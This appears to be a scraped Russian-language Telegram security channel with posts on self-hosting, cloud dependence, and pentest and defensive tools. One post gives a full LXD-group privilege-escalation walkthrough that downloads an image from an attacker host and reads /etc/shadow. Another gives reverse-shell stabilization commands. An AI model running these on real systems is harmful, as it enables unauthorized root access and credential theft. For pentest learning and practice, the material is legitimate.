cultofwire | Технологии

Telegram-канал cultofwire - Cult Of Wire

769

Мир проигравшего киберпанка. Картинки, новости, мануалы, DIY. Для связи: @the29a

Подписаться на канал

Cult Of Wire

В продолжении "There are no clouds, just someone else's computers" не могу не вспомнить четыре репы, которые уже тут были.

awesome-selfhosted - большой список разного selfhosted, большей частью рассчитан на замену пользовательских сервисов.

awesome-sysadmin - список разного selfhosted для сис. админов/девопсов.

deploy-your-own-saas - ещё одна репа со списком оpensorce софта, который может заменить ряд сервисов.

awesome-security - список security-related инструментов и сервисов.
Поскромней в размерах, но довольно полезный (и есть список со списком).

Что-то из этого уже давно используется бизнесом, что-то и в домашних условиях. И если в плане разворачивания сервисов для бизнеса и\или админам проблем больших нет, то обычным пользователям уже сложней.

Времена ограничений создают условия для взаимодействия и коллаборации. И расширения набора навыков.

Если не сейчас, то когда?

Читать полностью…

Cult Of Wire

Ещё до санкций были вопросы к сторонникам идеи того, что запихать всю инфру в облако это хорошая идея. Туда же идут и умные дома "в облаке", SD-WAN, стильное-модное-молодёжное управление инфраструктурой через портал вендора и прочие штуки.

Ифра в облаке не твоя инфра.
Инфа в облаке не твоя инфа.
Baremetal не атавизм, а необходимость.

Даже если эти санкции вас не коснулись, то поведение многих вендоров вызывает множество вопросов. ¯\_(ツ)_/¯

Читать полностью…

Cult Of Wire

Если вы не знаете, чем занять себя в этот вечер, то я нашёл развлечение - https://h4ck1ng.google/

Читать полностью…

Cult Of Wire

К OSCP готовится кто? Нашёл небольшой гайд OSCP tips and tricks.
На счёт актуальности не уверен (Buffer Overflow не убрали разве?), но интересные моменты есть.

Читать полностью…

Cult Of Wire

Пока все переворачивали календарь, поджигали костры рябин и сентябрь, я обновлял\добавлял набор инструментов.
На днях наткнулся на занятную штуку - hetty.

Ещё один HTTP proxy, со стандартным функционалом (перехват и изменение запросов, scope и прочее), работой с проектами. Киллер-фич нет, однако hetty легковесней, и работает прямо в браузере.
А ещё можно в докере запускать.

Github
Документация

Читать полностью…

Cult Of Wire

From LXC to etc

Использование чистого lxc в природе сейчас встретишь не часто, но в некоторых дистрибутивах он есть, например в Ubuntu 20.04.
И раз у нас есть такая крутая штука, то странно ей не воспользоваться.
Вообще это довольно интересный и своеобразный вектор атаки, и пишут про него не особо часто (ну да, ведь везде docker).

- Собираем образ на своей машине:
git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sudo ./build-alpine -a i686

Скачиваем файл
Полученный файл можно куда-то выгрузить, а можно раздать с веб-сервера, например так:

python3 -m http.server 8080

Забираем файл так:
wget http://<attacker-ip>:8080/alpine-v3.16-i686-20220603_1113.tar.gz

Или так:
curl http://<attacker-ip>:8080/alpine-v3.16-i686-20220603_1113.tar.gz --output alpine-v3.16-i686-20220603_1113.tar.gz

Как альтернативный вариант, можем использовать сразу образ из репозитория:
wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/alpine-v3.13-x86_64-20210218_0139.tar.gz

Импортируем образ:
lxc image import ./alpine*.tar.gz --alias evilimage

Предварительно проверяем, используется ли lxc
ip a | grep lxd
lxc list
lxc image list

И если ничего нет, то запускаем начальную настройку:
lxd init

Запускаем образ:
lxc init evilimage evilcontainer -c security.privileged=true

Монтируем /root в образ:
lxc config device add evilcontainer victimdevice disk source=/ path=/mnt/root recursive=true

Запускаем и радуемся результату
lxc start evilcontainer
lxc exec evilcontainer /bin/sh
cat /mnt/root/etc/shadow

И пара ссылок на тему:
lxd/lxc Group - Privilege escalation
Linux Privilege Escalation – Exploiting the LXC/LXD Groups

Читать полностью…

Cult Of Wire

Сканеры уязвимости:

trivy
trivy - простой, но хороший сканер уязвимостей. Находит уязвимые версии софта в зависимостях, секреты, мисконфиги.
Из удобств: можно использовать как standalone сканирование, например проверить репозиторий целиком, так и интегрировать в CI/CD (Jenkins, GitLab CI, GitHub Actions). Есть плагин для VSCode.

Репозиторий
Плагин для VSCode

docker-bench-security
Набор bash скриптов для проверки безопасности конфигурации образов и контейнеров. docker-bench-security больше рассчитан на интеграцию, standalone сканирование в целом есть, но не без страданий в работе.

Могут быть проблемы с интерпритацией вывода, так как используется CIS Benchmark.

Репозиторий

dockle
И линтер, и сканер.
Ищет CVE в ПО образа, проверяет корректность и безопасность конкретного образа, анализируя его слои и конфигурацию.
И вообще это лучший инструмент (по словам авторов).

Работает как отдельно, так и интегрируется с GitLab CI, Jenkins.

Репозиторий

Читать полностью…

Cult Of Wire

А ещё у него есть cli.

Не сказать, что он божественный и удобный (у меня автокомплит не работает), но он есть и даже работает.

Читать полностью…

Cult Of Wire

PHDays 11 это не только пьяный Вишняков, но и доклады, уже доступные тут.

Либо не всё попало на видео, либо крайне любопытных докладов в этом году меньше. Для себя из интересных отметил Domain admin blitzkrieg и Обход сигнатур WAF.
Видимо, основной фан впитал в себя Standoff.

Читать полностью…

Cult Of Wire

Получаем информацию о CVE через API.

Автоматизированные сканеры это хорошо, но false positive никто не отменял. Проверять это всё надо, но руками гуглить вариант долгий. Будем использовать публичный API.

Получить инфу по CVE со всеми деталями:

curl -s https://cve.circl.lu/api/cve/CVE-2021-41773 

Получаем информацию по CVE, выводя только версии ПО:
curl -s https://cve.circl.lu/api/cve/CVE-2021-41773 | jq ".id, .vulnerable_product"

Получаем информацию по CVE из списка:
cat cve.list | xargs -I % curl -s https://cve.circl.lu/api/cve/% | jq ".id, .vulnerable_product"

Кроме публичного API можно развернуть свой CVE-Search c преферансом и куртизанками Mongo и Flask.
И даже библиотека для Python есть.

P.S. Не удаётся получить список CVE по вендору, толи лыжи не едут, толи в локальной версии надо смотреть.

Документация к API
Локальный CVE-Search
Библиотека python

Читать полностью…

Cult Of Wire

Dockerhub + vulnhub = vulhub?

Виртуальные машины с уязвимостями это хорошо, а docker лучше.
Пока искал, как ещё развернуть уязвимый сервис, нашёл крутой проект от китайских коллег.

Братья из поднебесной заботливо собирают сервисы с CVE в виде docker-контейнеров, всё рассортировано по сервисам и номерам CVE.

Кроме того, в комлекте идут PoC или эксплоиты.

Документация почти вся на китайском, но почти всё сводится к:

cd service/CVE
docker-compose build
docker-compose up -d

Отличный повод перестать бояться и полюбить Docker.

Сайт проекта.
Репозиторий проекта.

Читать полностью…

Cult Of Wire

Без внятного scope результат - nope. Part 2.

Что делать дальше?

1. Можно собрать хэдеры для ручного разбора:
Пример:

cat dns-scan.out | xargs -n 1 curl --head -iL 

Сравнительно быстро, но не удобно. Если дружите с grep, может понравится.

2. Скормить nikto с выводом в html:
Долго, но на выходе получаем анализ защищенности, пускай и несколько беглый.

Пример:
cat dns-scan.out | xargs nikto -output out.html -h

3. Использовать WhatWeb:
Быстрый сканер, позволяющий получить кучу заголовсков, geoip, редиректы и версии.

Пример:
whatweb -i dns-scan.out -v --log-verbose=whatweb.out

4. И вишенка на торте: EyeWitness:
Сканер, позволяюий получить не только хэдеры, но и делающий скриншоты веб-страниц с сортировкой по коду ответа.

Пример:
eyewitness -f dns-scan.out --web

Да, по итогу готового варианта толком и нет. Однако можно использовать различные сканеры вроде reNgine.
Но это немного другая история.

Читать полностью…

Cult Of Wire

Заметка на полях по Wazuh.

При внедрении Wazuh возник вопрос, как проверять обнаружение уявимостей.
На свежих системах CVE нет, а тащить что-то непонятное не хочется.

Не в проде проверять же?

Варианта тут два:
1. Машины с vulnhub.
2. Metasploitable 3

С Vulnhub для проверки подойдет Typhoon, машина не самая древняя, и wazuh-agent установится без проблем.

С Metasploitable 3 всё немного сложней, но интересней. Готового образа нет, но можно собрать Ubuntu 14.04 и Windows Server 2008.
Системы не самые свежие, но плюс в том, что есть список уязвимостей, и можно проверить не только обнаружение, но и сработку на netcat, проактивные действия и всё прочее.

P.S. Можно ещё использовать docker-контейнеры с CVE, но это скорей для точечной проверки. Но тоже вариант.

Читать полностью…

Cult Of Wire

Раз пошла тема реверс-шеллов, то не могу пройти мимо revshells.com

P.S. Упоротая конструкция на PHP с эмоджи одновременно доставляет и вызывает инсульт жопы.

Читать полностью…

Cult Of Wire

Заметки на полях.
Стабилизируем reverse-shell:

На атакуемой машине запускаем что-либо из списка:

Python:
python3 -c "import pty; pty.spawn('/bin/bash')"

Ruby:
ruby -e "exec '/bin/bash'"

Perl:
perl -e "exec '/bin/bash';"

Переводим шелл в фон:
Ctrl+Z

На атакующей машине выполняем:
stty raw -echo && fg

На атакуемой машине:
export TERM=xterm

Читать полностью…

Cult Of Wire

Про недавнее отключение Meraki в РФ, которое толи было, толи не было, ничего не понятно, но очень интересно.

Вообще, вендоры с февраля начали отключать учётки ЛК, облачные лицензии, телеметрию и прочие сервисы. Все нормальные админы в энтерпрайзах, в свою очередь, поотключали доступ к своим железкам извне, и доступ самих железок к серверам вендора за обновлениями и прочими радостями. Ибо нефиг. Если же что-то до сих пор работает через облако из "недружественной страны" - то это, скорее, чья-то недоработка, а не ваша заслуга.

Ещё буквально год назад, когда уже отшумел кейс Parler (кто-нибудь вообще помнит, что это?), представитель AWS меня уверял, что те, мол, сами виноваты, никакой политики, а только неоднократное нарушение ToS и долгие уговоры "так больше не делать". Что размещаться в облаке совершенно безопасно, потому что облачный сервис отвечает своей репутацией и т.д. и т.п.
Примерно тогда же, за пивом сотрудники одного вендора сетевого железа сокрушались, что в РФ плохо продаются облачные сервисы типа SD-WAN/SD-LAN - мол, отечественный потребитель консервативен и не хочет приобщаться к мировым трендам, но это же так круто: ррраз - и у тебя ИИ всё настроил, вай-фай бегает, QoS там всякий, политики безопасности и проч. Удобно же! И опять же, "да ничего такого не случится, на западе все нормальные пацаны уже давно пользуются, крупный бизнес отвечает своей репутацией".

Пессимисты напоминают, что "There are no clouds, just someone else's computers". А все данные, которые лежат не на твоих серверах - это не твои данные, это тебе ими пользоваться дают за деньги.

И до недавнего времени, всё работало - параноики параноили, сидели на baremetal или строили свои приватные облака. Энтузиасты изучали Managed K8s и serverless. Мир победившего чистогана, и всё такое.

В этом году всё поменялось, и как бы нас не уверяли, что "это только с Россией так, потому что она плохая" и "ну мы всего лишь соблюдаем санкции", поменялось всё в глобальном масштабе. Slack блокирует аккаунты "потому что в вашем спейсе есть пользователи из РФ", Atlassian прекращает работать с российскими компаниями даже через посредников (т.е. это не вопрос движения денег), а Cisco отключает продукт, который даже не был официально запущен в РФ, и сбрасывает устройства "в дефолт" - а дальше уже как повезёт, возможно и кто-нибудь из TAC захочет поглумиться напоследок. Т.е. вся эта наша глобальная айтишечка, мир ТНК без границ и т.д. столкнулась с сермяжной правдой - границы вполне себе существуют, законы соблюдаются там, гле платятся налоги, а тебя могут забанить даже just because fuck you (см. Parler).

Мантры про "ну для Cisco РФ - это меньше 5% рыкна" сродни мантрам про "всего 2% мировой экономики". Что случается при попытке "отключения" двух процентов мировой экономики - можно почитать в новостях. Думаю, с IT будет примерно тоже самое - торговые войны, регионализация провайдеров и тотальное недоверие всех ко всем. И "цифровой суверенитет", который раньше воспринимался исключительно как блажь и "да нафига вам это, надо просто участвовать в мировой кооперации" внезапно играет новыми красками...

Читать полностью…

Cult Of Wire

Немного про Flipper Zero.

Если коротко, то "Вау" не произошло, хоть устройство и интересное.

Если вам повезло его приобрести (говорят, в амперке ещё появится), то в первую очередь его стоит обновить. А лучше даже прошить кастом, так как родная прошивка скорей для регуляторов, чем для конечных пользователей.

Для обновления есть удобный qFlipper и возможность обновить через мобильное приложение (фича в бете), или даже через web (работает только в Google Chrome).

В плане кастомых прошивок есть из чего выбрать:
- Unleashed Форк оригинальной прошивки с разблокированными частотами, плагинами от коммьюнити и прочим. Для начинающих самое оно, так как нужный функционал на месте и установка проблем не вызывает (хоть через qFlipper, хоть через web)

- RogueMaster Форк Unleashed с дополнительными твиками и фичами из dev-ветки официальной прошивки. Функционал должен оказаться больше, однако стабильная работа не гарантируется.

Есть и другие, но они либо не поддерживаются, либо имеют скудный набор изменений.

Всякая полезная нагрузка.
Чтобы уйти чуть дальше копирования своего ключа от домофона или управлением своим телевизором, нам пригодится куча дампов\полезной нагрузки, которая собрана в разных местах, например в репе UberGuidoZ Playground или архивом тут.

В целом, для хорошего старта этого набора должно хватить. Но имеет смысл собирать из кучи разрозненных дампов и прочего собирать свой репозиторий, так как кажется, что много всего, но много повторов, да и вообще всё в кучу.

Пойду свой репо собирать, что ли.

Доп. ссылки:
Репозиторий Awesome Flipper Zero
Документация
Flipper Zero Hacking 101

Читать полностью…

Cult Of Wire

Наканецта.
Я джва года ждал. (с)

Читать полностью…

Cult Of Wire

Быстрее, выше, жирнее.

gowitness - веб-скриншотер, использующий Chrome Headless, своеобразный EyeWitness на стероидах. Собирает не только скриншоты страниц (которые он показывает в галерее), но и полные хидеры, сетевые логи и информацию по сертификату и лог консоли.

Функционал может показаться немного перегруженным, но инструмент хороший.

P.S. Бывает баг с сохранением скриншотов, лечится ручным созданием директории screenshots. ¯\_(ツ)_/¯

Github
Wiki

Читать полностью…

Cult Of Wire

Ну что, с Днем знаний.

Лето закончилось, а это значит, что время, проводимое за компьютером придёт в обычную норму (если вы не ноулайфер, разумеется). А ещё это время когда оживают всякие рекрутеры, HR и прочие товарищи из мира кадров.

Нашёл у себя буржуйсий сборник вопросов "Here are the 300 interview questions for cyber security roles", подходящий не только как подготовка к собеседованиям, но и самим пройтись по многим вопросам полезно.

Так что самое время учиться, заполнять свой цеттелькастен и/или забивать заметками Obsidian.
Или готовиться к собеседованию. Мало ли.

Читать полностью…

Cult Of Wire

И немного дополню это всё, так как только инструментами всё не решается.

CIS Benchmarks
Docker Best Practice
Aquasec Top 20 Docker Security Best Practices

Да, кроме этого есть ещё clair, Lynis, но первый довольно масштабный, и нужен не всем, а Lynis довольно своеобразен.

Если вы не планируете интеграцию в CI/CD, то trivy отличный вариант.
А в CI/CD можно и dockle или clair засунуть интегрировать.

Читать полностью…

Cult Of Wire

Секурим докер.

Когда речь заходит про безопасность docker, то обычно сразу всплывает всякий сбор логов, мониторинг и "надо было ставить линукс" "давайте запихаем агент Wazuh".
Однако, как с вешалки начинается театр, так жизненный путь контейнера начинается с dockerfile. C них и начнем.

Из простого: какой-нибудь линтер.

Для ленивых - fromlatest.io
Поправить синтаксис, теги, убрать всякий deprecated и вообще держать всё в удобочитаемом виде дело важное.

hadolint
Локальный линтер, который можно запускать как в установленном виде, так и из докера. Может проверять как локальные докерфайлы, так и из registry. Проверки репозитория нет, так что при необходимости придётся решать это костылями.

Репозиторий
Web-версия

Читать полностью…

Cult Of Wire

Неочевидная фича KeePassXC.

В KeePassXC можно посмотреть статистику стойкости паролей и их реюз.

Database -> Database Reports -> Health Check.

P.S. Там же есть ещё проверка паролей на haveibeenpwned.com, вдруг кому надо.

Читать полностью…

Cult Of Wire

Превращаем простыню в отчет.

Не секрет, что вывод nmap читать довольно проблемно, особенно при большом количестве хостов, да ещё и со скриптами.

Разбирать это всё руками удовольствие сомнительное, хочется сей труд упростить.

Нашёл для себя nmap-formatter. Небольшой инструмент, позволяющий конвертировать xml-вывод в html, csv, markdown и json.

Работает не идеально (местами ссылки там, где их нет, например), но сильно упрощает дело.

Ещё есть nmap2md. Строит небольшие таблицы в markdown, и с хитрым сканированием может не работать.
Но для простого сканирования, вроде инвентаризации своей сети вполне подойдет.

Читать полностью…

Cult Of Wire

Тут таблицу со всякими security сертификациями обновили.

Как и всегда, в топе сертификации от OffSec и GIAC.

Читать полностью…

Cult Of Wire

Свежие танцы по старым граблям с зеленым зверем.

Понадобился мне OpenVAS для сравнения с другими сканерами.
По старой памяти помню, что во всяких пентестерских дистрибутивах он устанавливался, хоть и не без проблем. Однако же, в ParrotOS что-то было заботливо сломано ещё при установке (потеряли либу), то в Kali оно хоть и запустилось, но выпадало в ошибку на попытке добавить таск.

Есть два варианта:

1. Использовать триальную VM с сайта Greenbone. Для простого сканирования активировать не требуется, будет работать с фидами Community. Годится только для теста (или пощупать перед покупкой).

2. Использовать docker-контейнер.
Официальный образ уже давно покрылся мхом, но мир не без добрых людей. Образ рабочий, свежий, фиды обновляются и можно даже в прод тащить.

Ссылки:
Git проекта
Страница с документацией
DockerHub

Читать полностью…

Cult Of Wire

Без внятного scope результат - nope.

Что при защите, что при нападении определить скоуп очень важно.
В случае с внутренней инфраструктурой (при защите) всё можно собрать системой инвентаризации, то с внешними сервисами это работает не всегда.

При большой инфраструктуре можно использовать везде ip-адреса, но это уже скорей админский Self-harm best practice, так что будем искать DNS-записи.

dnsdumpster.com - простой и надежный онлайн сервис. Кроме самих dns-записей, которые можно экспортировать в xslx (зочем?), рисует довольно полезные диаграммы.

сrt.sh - поиск сертификатов по (под)доменам. На сайте экспорта в файл нет, но вы держитесь.

sublist3r - простой консольный инструмент, собирающий записи с разных источников, в том числе и crt.sh.
Работает довольно быстро.

amass - комбайн от OWASP. Собирает записи с кучи источников, визуализирует. Чтобы не было сложно и непонятно, стоит обмазаться документацией.

Читать полностью…

Cult Of Wire

Немного о забивании гвоздей микроскопом.

Чтобы не вылезая из консоли посмотреть содержимое дампа трафика в открытом виде можно использовать tcpick.

tcpick -C -yP -r tcp_dump.pcap

Извлечь содержимое дампа без Wireshark тоже можно не вставая с дивана, но уже другой утилитой - tcpxtract.

tcpxtract -f tcp_dump.pcap

Читать полностью…

Cult Of Wire

Линк из комментов.

penelope - хэндлер на стероидах с солидным функционалом.
- автоапгрейд шелла
- загрузка файлов в обе стороны
- загрузка скриптов (например linpeas и PowerUp)
- логировние сессий (хуяк-хуяк и райтап)
- поддержка множества сессий.

А ещё можно прикрутить его к metasploit.

Читать полностью…

Cult Of Wire

Итак, год заканчивается, а у кого-то он уже закончился.

Стоит подвести итоги, хотя подводить особо нечего. Мало писал, мало сделал, в общем образец непродуктивности. Зато регион проживания сменил.

На следующий год уже есть планы, так что будет интересно. (Но это не точно.)

Всех с новым годом.
И как говорил классик: "Вы держитесь здесь, вам всего доброго, хорошего настроения и здоровья!"

https://m.youtube.com/watch?v=8PzPHKGpNXs

Читать полностью…
Подписаться на канал